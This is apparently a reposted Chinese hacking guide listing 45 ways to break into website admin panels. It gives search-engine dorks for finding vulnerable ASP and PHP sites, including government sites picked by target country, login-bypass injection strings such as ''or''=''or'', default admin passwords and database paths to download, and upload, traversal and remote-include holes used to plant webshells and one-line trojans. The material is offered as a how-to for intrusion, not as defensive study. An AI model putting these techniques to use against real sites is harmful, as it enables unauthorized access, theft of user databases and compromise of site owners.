45種攻入網站后台的方法


45種攻入后台的方法
1、到Google搜索,site:cq.cn inurl:asp
2、到Google,搜索一些關鍵字,edit.asp? 韓國肉雞為多,多數為MSSQL數據庫!
3、利用挖掘雞和一個ASP木馬:
文件名是login.asp
……
路徑組是/manage/
關鍵詞是went.asp
用’or’='or’來登陸
4、以下這個方法因為太多人做過,所以一些網站管理員對此都有防范之心了,成功率不高:
關鍵字:“Co Net MIB Ver 1.0網站后台管理系統”
帳號密碼為 ‘or’='or’
5、動感購物系統,呵呵。想到了明小子:
inurl:help.asp登陸,如未注冊成為會員!
upLoad_bm1.asp和upLoad_c1.asp這兩個隨便選個,一般管理員都忽視了這2漏洞。
6、默認數據庫地址blogdata/acblog.asa
關鍵字:acblog
7、百度 /htdocs
注冊里可以直接上傳asa文件!
8、/Database/#newasp.mdb
關鍵詞:NewAsp SiteManageSystem Version
9、用挖掘機
關鍵字:Powered by WEBBOY
頁面:/upfile.asp
10、baidu中搜索關鍵字Ver5.0 Build 0519
(存在上傳漏洞)
11、Upfile_Article.asp bbs/upfile.asp
輸入關鍵字:powered by mypower ,
應該是動什么上傳漏洞來着?用的人也比較多
估計明小子,挖掘雞就可以了
12、inurl:winnt\system32\inetsrv\
在google里面輸入這個就可以找到很多網站
13、現在GOOGLE搜索關鍵字 intitle:網站小助手 inurl:asp
14、關鍵字: 首頁 最新動態 新手指南 舞曲音樂 下載中心 經典文章 玩家風采 裝備購買站內流言友情連接 本站論壇
挖掘雞的關鍵字 添 setup.asp
15、VBulletin論壇的數據庫
默認數據庫地址!
/includes/functions.php
工具:
1)網站獵手。下載地址:百度 Google!
2)Google
關鍵字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一個就可以了
16
1)打開百度或GOOGLE搜索,輸入powered by comersus ASP shopping cart
open source。
這是一個商場系統。
2)網站的最底部分,有個 Comersus Open Technologies LC。打開看下~~comersus系統~
猜到,comersus.mdb. 是數據庫名
數據庫都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp換成database/comersus.mdb,不能下載。
那樣把前一個’’store/”除去,再加上database/comersus.mdb 試試
都是默認數據庫地址
17、無憂傳奇官方站點程序。
1)后台管理地址:http://您的域名/msmiradmin/
或者是 http://您的域名/admin.asp
2)默認后台管理帳號:msmir
3)默認后台管理密碼:msmirmsmir 或 msmir
數據庫文件為 http://您的域名/msmirdata/msmirArticle.mdb
或者是 http://您的域名/msmirdata/msmirArticle.asa
數據庫連接文件為 ***********/Conn.asp
也是默認數據庫地址。 現在傳奇4F好多都是這個。呵呵我剛還沒事搞了個呢`
18、百度里輸入/skins/default/
19、利用挖掘機
關鍵機:power by Discuz
路徑:/wish.php
配合:
Discuz!論壇 wish.php遠程包含漏洞
……
20、上傳漏洞.
工具 : 當然還是明小子了
網站獵手 或者挖掘雞了。
關鍵字powered by mypower
檢測的頁面或文件插入upfile_photo.asp
這個用的人也N多。。
21、新雲漏洞
這個漏洞ACCESS和SQL版通吃。
Google搜索關鍵字 “關於本站 – 網站幫助 – 廣告合作 – 下載聲明 – 友情連接 – 網站地圖 – 管理登錄”
把flash/downfile.asp?url=uploadfile/http://www.cnblogs.com/conn.asp提交到網站根目錄。就可以下載conn.asp
以源碼,軟件等下載站居多。
大家時常碰到數據庫如果前面或者中間+了# 可以用#替換就可以下載了
\database\#newasp.mdb
如:#xzws.mdb 改成#xzws.mdb
收集的。沒試過。。。 – -!
22、通吃所有商城+動力上傳系統
使用工具:挖掘雞 v1.1 明小子
商城入侵:
關鍵字:選購->加入購物車->去收銀台->確認收貨人信息->選付款方式->選配送方式->在線支付或下單后匯款->匯款確認->發貨->完成
漏洞頁面:upload.asp
upfile_flash.asp
還是上傳漏洞拿webshell
23、注射漏洞
百度搜索ioj’s blog
24、動易
列目錄
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25、
工具:網站獵手
關鍵詞:inurl:Went.asp
后綴:manage/login.asp
口令:’or’='or’
這軟件還不是太熟悉。 – -
26、
入侵魔獸私服
需要的工具:ASP木馬 – -!廢話了。
明小子
關鍵字:All Right Reserved Design:游戲聯盟
后台地址:admin/login.asp
數據庫的地址:chngame/#chngame.mdb
都默認的。數據庫鬧下來自己解密吧不多說了。
27、
漏洞是利用管理員iis設置的失誤
用baidu 關鍵字就是比較罕見的腳本名
動網: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
動易: admin_articlerecyclebin.asp
好像比較少吧不太清楚了這個。。
28、
國外站的爆庫漏洞
關鍵字:sad Raven’s Guestbook
密碼地址:/passwd.dat
后台地址:/admin.php
29、
Discuz 4.1.0跨站漏洞
利用工具:1)WAP瀏覽器
2)WAP編碼轉換器
關鍵字:”intextiscuz! 4.1.0″
WAP瀏覽器…………………………!!
30、
關鍵字:尚奈克斯
后台路徑/system/manage.asp
直接傳ASP木馬
挖掘機去。。 – -!
31、
工具
1:網站獵手
2:大馬
關鍵字:切勿關閉Cookies功能,否則您將不能登錄
插入diy.asp
32、
關鍵字:Team5 Studio All rights reserved
默認數據庫:data/team.mdb
剩下的自己搞。不多說了
33、
工具: 挖掘機 輔臣數據庫讀取器
關鍵字: 企業簡介 產品展示 產品列表
后綴添加: /database/myszw.mdb
后台地址: admin/Login.asp
都默認的。一樣。數據庫鬧下來自己解密碼去 。就行了。。 – -
34、
關鍵子 XXX inurl:Nclass.asp
……
在”系統設置”里寫個木馬。
會被保存到 在 config.asp內。
35、
不進后台照樣拿動網WEBSHELL
data.asp?action=BackupData 動網數據庫備份默認路徑
沒試過。。。不知道。
36、
工具:網站獵手 WebShell
關鍵字:inurl:Went.asp
后綴:manage/login.asp
弱口令:’or’='or’
也沒試過。 。。。。。。
37、
關鍵字owered byCDN_NEWS
隨便掃遍文章加一個’ ,來試探注入點
后台地址:admin_index.asp
用啥工具我就不說了吧。。。。。。。。。
38、
入侵雷池新聞發布系統
關鍵字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上傳馬…..
進訪問uppic anran.asp 登陸馬.
—-
沒試過。汗 ,收集來的。
39、
工具挖掘機就行了。
關鍵字ower System Of Article Management Ver 3.0 Build 20030628
默認數據庫:database\yiuwekdsodksldfslwifds.mdb
后台地址:自己掃描!
工具明小子。- -!怎么又是他啊。
MD5自己解………
(NND這個一掃一大堆。大家可以去試試。。)
40、
一、通過GOOGLE搜索找大量注入點
關鍵字:asp?id=1 gov.jp/ asp?id=
頁數:100
語言:想入侵哪個國家就填什么語言吧
41、
關鍵字:Powered by:94KKBBS 2005
利用密碼找回功能 找回admin
提問:ddddd 回答:ddddd
42、
關鍵字:inurl:Went.asp
后台為manage/login.asp
后台密碼: ‘or’=’ 或者 ‘or”=”or’ 登錄 進入
默認數據庫地址atabase/DataShop.mdb
43、
關鍵字:****** inurl:readnews.asp
把最后一個/改成\ ,直接暴庫,看密碼,進后台
隨便添加個新聞 在標題輸入我們的一句話木馬
44、
工具:一句話木馬
BBsXp 5.0 sp1 管理員猜解器
關鍵詞:powered by bbsxp5.00
進后台,備份一句話馬!
45、
關鍵字:程序核心:BJXSHOP網上開店專家
后台:/admin


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM